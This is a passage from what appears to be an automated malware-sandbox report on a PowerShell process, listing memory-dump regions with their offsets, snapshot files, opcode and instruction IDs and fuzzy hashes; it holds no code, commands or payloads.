                                                                                                                                                                                    • Instruction Fuzzy Hash: 48915D74A00614DFCB14DF98C555AAEBBF2EF88715F15C0A9E805AB355CB32EC42CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                                                                    • Opcode ID: ed596a0421ac79f7796e3c80d05a8dfcd2569489bdb5c59187bf89033f3b1c87
                                                                                                                                                                                    • Instruction ID: 5071e1cbdffba1bebee37e86fe6a5cb4110e25b0c23bdb98a6ec7afb6fed8aab
                                                                                                                                                                                    • Opcode Fuzzy Hash: ed596a0421ac79f7796e3c80d05a8dfcd2569489bdb5c59187bf89033f3b1c87
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49110B31D04345CFD7618F1886119AABBF0AF85278F1950AFD454DB242E731E556C7E2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (f}l
                                                                                                                                                                                    • API String ID: 0-3591226775
                                                                                                                                                                                    • Opcode ID: ced46dd9fed7edeb1e07eb9f92031bb7df445465265ba92bf341a11b82e6c4d8
                                                                                                                                                                                    • Instruction ID: d10bac81a903c95c7dfff9fa890aa050266469df56368bc87690ebd42699367a
                                                                                                                                                                                    • Opcode Fuzzy Hash: ced46dd9fed7edeb1e07eb9f92031bb7df445465265ba92bf341a11b82e6c4d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28914C70A00304DFDB54CF58CA41EAABBB2BF89328F15916DD9056B351C772ED46CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: x.nk
                                                                                                                                                                                    • API String ID: 0-2617426556
                                                                                                                                                                                    • Opcode ID: e40b2878f5082d6abf8802cd7ce04183f570acbf3e7180ea13b4c5222509e9cf
                                                                                                                                                                                    • Instruction ID: dbe06632ff07133142c3ad3b1170a3d8e0af4899d3af262926f74fc5798e6597
                                                                                                                                                                                    • Opcode Fuzzy Hash: e40b2878f5082d6abf8802cd7ce04183f570acbf3e7180ea13b4c5222509e9cf
                                                                                                                                                                                    • Instruction Fuzzy Hash: F431C570B40204AFD7149B69CA51FAF7AA3EF84314F158418E9066F395CEB2EC468BE1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q
                                                                                                                                                                                    • API String ID: 0-1614139903
                                                                                                                                                                                    • Opcode ID: a4b8e66409a2cee7b358e3bc765857caccebe02c802b3c71eceb5be3ec56d303
                                                                                                                                                                                    • Instruction ID: 9a815240ec11314878a7feb560e0bedeb7cdcf445865e6e5e5a1fafdd2439069
                                                                                                                                                                                    • Opcode Fuzzy Hash: a4b8e66409a2cee7b358e3bc765857caccebe02c802b3c71eceb5be3ec56d303
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05212131F00305CFDFA85A248761BBE7AA39F80264F18506DCC01DF299DB39E982C7A1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 556ddaa967629079861c24457f71388587429f30dbb0764e959147a15d2b17ec
                                                                                                                                                                                    • Instruction ID: 7f24ae024f4c328043a7a9489e913ac369e32d03ef03479a3576a513175688dc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 556ddaa967629079861c24457f71388587429f30dbb0764e959147a15d2b17ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9021774A012099FCF05CF9CD984A9EBBB2FF88310F658199E905AB365D731ED81CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 79082e22535b53df22ca179407ee747b5eb84743717b3aff2216bbfc70585434
                                                                                                                                                                                    • Instruction ID: 6f040399783120ae5c6b29b13594b35ec9acf855f47ff871d9bcede2a51781a2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79082e22535b53df22ca179407ee747b5eb84743717b3aff2216bbfc70585434
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67021A74A002499FCB05CF9CD584AAEBBB2FF49310F658199E905AB365C731ED86CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 31966be805a33ca17ad64cc535bf428e40d91343f0a769c5677786838a7fc270
                                                                                                                                                                                    • Instruction ID: a33986aa3d0b62c3f5dbba7f3f6ea4f0297beba6614c1a363fb6fc137ac49734
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31966be805a33ca17ad64cc535bf428e40d91343f0a769c5677786838a7fc270
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02020B75A00209DFCF05CF98D594AAEBBB2FF88310F658199E815AB365C731ED81CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 16edbf35892840d1b655629b1181bd5fcccdceec020b1c3a99efd2f735b03824
                                                                                                                                                                                    • Instruction ID: 9ba97f3d0bfa82224e8d311d0aefa781881a6b835ab3b02b1675e3271720379e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 16edbf35892840d1b655629b1181bd5fcccdceec020b1c3a99efd2f735b03824
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FE10A74A00609DFDB05DF98D594AAEFBB2FF48310F648199E805AB365C731ED86CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 9f088c1947f53fadb9da8013dc1af7d4c0da7d93023977738f608741d0f31b0e
                                                                                                                                                                                    • Instruction ID: 8a265ab8d9028fb2c957e9ab24022f1f13837ebfaccdcfa1782286e7a31e6179
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f088c1947f53fadb9da8013dc1af7d4c0da7d93023977738f608741d0f31b0e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01C1BF35A002089FDB15DFA8D954AADBBF2FF84714F158659E4069B3A4DB34FC4ACB80
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: b2ebdb4f9d7048d7ff195996aaa2b90ef10aeb0022f6176d38e67b5f634e9cbf
                                                                                                                                                                                    • Instruction ID: 637e27cc8887d33b3a0ac20701adba93d3069f2246234a9a042c3e5083319706
                                                                                                                                                                                    • Opcode Fuzzy Hash: b2ebdb4f9d7048d7ff195996aaa2b90ef10aeb0022f6176d38e67b5f634e9cbf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 17817F30B006058FCB14DFA9D980AAEBBF6FF88304F548569D4059B365DB34ED46CBA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6b2bfb4f409408b16c9c0420f1677e2c91446a1e83e862c887ea42d3585720d1
                                                                                                                                                                                    • Instruction ID: 35f357e5612b93913fbe28f55e98369dd571d9d0b45aca433ffd6ea1ca508918
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b2bfb4f409408b16c9c0420f1677e2c91446a1e83e862c887ea42d3585720d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D718B30A012098FCB14DF68C890A9DBBF6FF85314F14CA6AE415DB6A1DB75BC46CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: aaab2206c3188f0c55dd1d0a529faeb65eef24cbd204a39c27f232bac6855534
                                                                                                                                                                                    • Instruction ID: a424404f39cad1bc58b45a8630f1c3d45ddae3eb9c43770495302008bf3d0e56
                                                                                                                                                                                    • Opcode Fuzzy Hash: aaab2206c3188f0c55dd1d0a529faeb65eef24cbd204a39c27f232bac6855534
                                                                                                                                                                                    • Instruction Fuzzy Hash: E3714A70E002089FDB14DFA5D994BADBBF6BF88304F148569E412AB7A0DB35BD46CB50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c3c1eae1f797b58c62c417d65d75643546bb6b7a58a788a62fea2efa7a88d04d
                                                                                                                                                                                    • Instruction ID: dea99895b704297732be892c7316c40b89ad3d1e6b69b1a4ad606cbbdf68f2bc
                                                                                                                                                                                    • Opcode Fuzzy Hash: c3c1eae1f797b58c62c417d65d75643546bb6b7a58a788a62fea2efa7a88d04d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8951B0709092858FCB06CF28C4E49AABFB0EF06314B1586D6C8919B2E6C735FC55CBA4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 94d04d8d31e0ee0cceadb9d73a0e7b674e740b799c80e1ee8eb7b70bc39e6f91
                                                                                                                                                                                    • Instruction ID: 8669663a5765b1436ab7d278b3828371677e664e40f9d5d0057b5d563f6697f9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94d04d8d31e0ee0cceadb9d73a0e7b674e740b799c80e1ee8eb7b70bc39e6f91
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48515E70E052459FCB05CF9CC9909AEBBF2FF49320B25829AD954EB3A5D335AD41CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e25ac3183649a44eaa237a5b89084815efbc806563289f50c6460307a6579605
                                                                                                                                                                                    • Instruction ID: 5f266ca50bad9d7273377836d6a47ae078d4722ff442f57d8c4eb77e969ccdae
                                                                                                                                                                                    • Opcode Fuzzy Hash: e25ac3183649a44eaa237a5b89084815efbc806563289f50c6460307a6579605
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C414C31E103018FCB554F288B11A697BA6AF85264F09909EDB019F262D735DA47C7A2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2149900543.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_6ec0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 4f885ece211ce609d5c70b346a6ba9ad682693e5d7b70d94c49a6492851a9f12
                                                                                                                                                                                    • Instruction ID: f7ce2ad232119cc699b1b7f7c6fc96128d3fefc70aedfbcb0ca06b280dc11e9b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f885ece211ce609d5c70b346a6ba9ad682693e5d7b70d94c49a6492851a9f12
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A413A32B043058FCB555B788B01AABBFA19F81320F04957ED806DB692DB31D946C7A2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 4c5f29ee0ca5ef467de9abcecf6ab6161095acdafad9b8083ca005587bda12e3
                                                                                                                                                                                    • Instruction ID: a13b8c324e14f59a4f0e5070c00eb2e3b64f266056cc7e5b7da552d8c788ba36
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c5f29ee0ca5ef467de9abcecf6ab6161095acdafad9b8083ca005587bda12e3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40418F35B402148FDB15DF74D9646AABBF2EF89350F089569E402EB7A0CF35AC41CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a53790af5def55e6e1c7f44a832ad2d2e1438c244cd3bec50e1a3ea4cdaf64c3
                                                                                                                                                                                    • Instruction ID: 8d09ff540b504cc0e33832670980063a6c4248b0c48b569400d492140bcdc061
                                                                                                                                                                                    • Opcode Fuzzy Hash: a53790af5def55e6e1c7f44a832ad2d2e1438c244cd3bec50e1a3ea4cdaf64c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC410874A005198FCB09CF9CC984AAEB7F1FF48311B258269E915EB3A4C735EC51CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f3b5f10b9375eabeb60b9879e2cc12e970d178b0f077af2ff5a60b2d158a0171
                                                                                                                                                                                    • Instruction ID: 4c3e180302679be720d327ac66cfaf6af4245ad5512775cdf3fd68d2afb581ef
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3b5f10b9375eabeb60b9879e2cc12e970d178b0f077af2ff5a60b2d158a0171
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9413034B002088FDB08DF79D5947AEBAF7AF88310F18C469D805AB795CE35DC468BA0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a62e8eace986e3fe59a8afec7a88b798b32e6a13f077edb8e225dbf264228a8d
                                                                                                                                                                                    • Instruction ID: fbf8f03cc3d3b6692b6cef18e7105bced7dda02c4dd4d5eac7322e38d9667df9
                                                                                                                                                                                    • Opcode Fuzzy Hash: a62e8eace986e3fe59a8afec7a88b798b32e6a13f077edb8e225dbf264228a8d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 76416E70A012088FDB14DFA9C8946ADBBF2BF88304F158969D405AB7A4DB75BC46CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d6fe581ee027cb25bc80d7c5a4538dff72303e7b2d7aee67d7e7b4150b50d78f
                                                                                                                                                                                    • Instruction ID: e380994536399c56b12d0870251f45bbdc46eaf98c393560eb6b0abeb64c63f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6fe581ee027cb25bc80d7c5a4538dff72303e7b2d7aee67d7e7b4150b50d78f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C410774E106099FCB05CF9CC4849AEBBF1FF48311B648659E915AB3A4C735EC52CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3c2d6e3f197f3397c0be3e4b199eca9859888249a22befed2b862a76e612e555
                                                                                                                                                                                    • Instruction ID: a8a856923a4e73cc2aa638b538804087ea2d4a4a4e9514f9df07b4c3811e4b16
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c2d6e3f197f3397c0be3e4b199eca9859888249a22befed2b862a76e612e555
                                                                                                                                                                                    • Instruction Fuzzy Hash: 424128B4A005058FCB09CF58C5E8AAAF7B1FF48314B118699D815AB3A4C732FC51CFA0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 54b720a67860470c9f5ad660ced78f3d8a5d10639f39adbe4b0da56132c022a1
                                                                                                                                                                                    • Instruction ID: 61f53c7c3178f01af41371b7dca70f187ecd5c7307cb57dfdedac99718ef6d59
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54b720a67860470c9f5ad660ced78f3d8a5d10639f39adbe4b0da56132c022a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: FE310674E00509DFCB14DF99C584AAAFBF2FF88310B248699D459AB755C731EC82CBA0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1018b91efafb36cffd89d291ef4029de4c642d2480bafcd5de5e20fc0f200168
                                                                                                                                                                                    • Instruction ID: 63c4c0aeea1102de5e63e6c569b4d88aa19b19af589ebaec2febbf1a0cacecd0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1018b91efafb36cffd89d291ef4029de4c642d2480bafcd5de5e20fc0f200168
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC212475500200DFCF25DF14EAC0B2ABFA1FB88314F24C5A9E9099B696CB36E456CB61
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                    • Instruction ID: 808d4369ed9d6d1111fa10d910d46fff0f944627534d2ab5c9062738cc963783
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0021AE76504240DFCF26CF10D5C4B16BF71FB44314F24C5A9D9094A656C73AD46ACB91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143952057.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4300000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6d8e9abdefc26105dc4d678bccbf41481c99311c2be755c94b9c1ea6e51fec7e
                                                                                                                                                                                    • Instruction ID: 5e4f1eac26c69b7cffb26db7caf3827f2fde8f5166c188a4c8f6439b9f626446
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9abdefc26105dc4d678bccbf41481c99311c2be755c94b9c1ea6e51fec7e
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC01A2B8B402189FCB00DF98D490AADF771FF8D300B208299D55A9B361CA36EC43DB50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 464a61ce85433d767049fa270efcf00cd9cb5ec68520a127f288a2806be7f2f8
                                                                                                                                                                                    • Instruction ID: d6b1edf7ba35f3fbfcae1bebfefc24d5a40fdfaa31f7d96745c7a78aad29aa9f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 464a61ce85433d767049fa270efcf00cd9cb5ec68520a127f288a2806be7f2f8
                                                                                                                                                                                    • Instruction Fuzzy Hash: F201F7724097009AE7104F65D9C4F67BFA8DF41324F08C429EC4E5B1C6CB799841C6B1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2143709737.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_2a0d000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 728410f34522d73ef664f969b8e2b813985bc6242b8cbb9a77211655bf7f1739
                                                                                                                                                                                    • Instruction ID: 2d3a4cd771ce56985a2fec6e58a33a023f4e3d039cb232326895ba23041d0436
                                                                                                                                                                                    • Opcode Fuzzy Hash: 728410f34522d73ef664f969b8e2b813985bc6242b8cbb9a77211655bf7f1739
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02014C6240E3C09ED7128B259994B52BFB4EF42224F1880DBD8889F1E3C2699849CB72
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2156214259.0000000008B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8b10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ef092df309a569925cdb3c02be67d51eea25b4f90ddf224ff8c2d994afe03739
                                                                                                                                                                                    • Instruction ID: 4b734adaae64dc2134263c42e535b32312c65e4c290c62a0ed546d9200067722
